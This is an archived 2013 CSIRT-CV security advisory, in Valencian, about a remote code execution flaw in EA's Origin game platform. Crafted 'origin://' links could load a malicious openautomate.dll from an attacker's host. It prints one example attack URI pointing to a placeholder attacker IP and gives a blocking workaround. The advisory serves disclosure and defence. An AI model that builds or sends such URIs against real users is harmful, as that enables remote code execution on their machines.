Está usted visitando una publicación en la hemeroteca de CSIRT-CV.
Para acceder al portal y contenido actual, visite https://www.csirtcv.gva.es
22/03/2013
Els investigadors Luigi Auriemma i Donato Ferrante, de la firma ReVuln, que ja van alertar d’una vulnerabilitat semblant en Steam al novembre de 2012, han realitzat la mateixa anàlisi en la plataforma d’Electronics Arts i han trobat una vulnerabilitat equivalent. Segons les seues investigacions un atacant remot podria executar codi maliciós a través d’enllaços “origin://” especialment manipulats.
Bàsicament la plataforma Origin utilitza el següent protocol per a iniciar i comprovar la validesa d’un joc:
Inici de l’executable del joc que crida a la plataforma Origin instal·lada en el sistema, per mitjà d’un URI personalitzat a este efecte "origin://"
Tancament del procés del joc.
La plataforma Origin una vegada fetes les comprovacions DRM que indiquen que el joc és original, el llança a través del mateix URI inicial subministrat.
Este URI "origin://" com a tal és accessible a través de qualsevol accés directe del sistema o des del navegador, per la qual cosa un atacant només hauria d’incloure un URI maliciós en la seua pàgina web, o en un correu i distribuir-lo.
Els investigadors comenten que hi ha diferents maneres d’aconseguir que s’execute el codi. En el seu comunicat se centren en la funció OpenAutomate, que permet iniciar un test de comprovació del sistema.
Una URI maliciosa utilitzant este comandament seria la següent:
origin://comando/< ID_joc>?CommandParams=-openautomate\\<IP_atacant>\\openautomate.dll
On ID és l’identificador del joc instal·lat en el sistema i openautomate.dll la llibreria especialment modificada que, a part d’executar el joc, inicia el codi maliciós des de la IP de l’atacant.
La ID del joc no és particular per a cada usuari, per la qual cosa és trivial incloure en una crida un conjunt d’IDs de jocs vulnerables per “openautomate” per a explotar-ne la vulnerabilitat, encara que no es conega a priori quin joc del catàleg manté l’usuari instal·lat en el seu sistema.
En este vídeo es pot veure el procés complet i la demostració de la vulnerabilitat: http://vimeo.com/61361586
Sistemes Afectats:
Plataforma de jocs en línia Origin.
Referències:None
Solució:Com a solució temporal, s’indica la possibilitat de desactivar o bloquejar el protocol "origin://" en el sistema i en el navegador, per la qual cosa només es podria iniciar el joc des de la plataforma Origin directament, fins que se solucione la vulnerabilitat.
Notes:
ReVuln - EA Origin Insecurity (when local bugs go remote... again)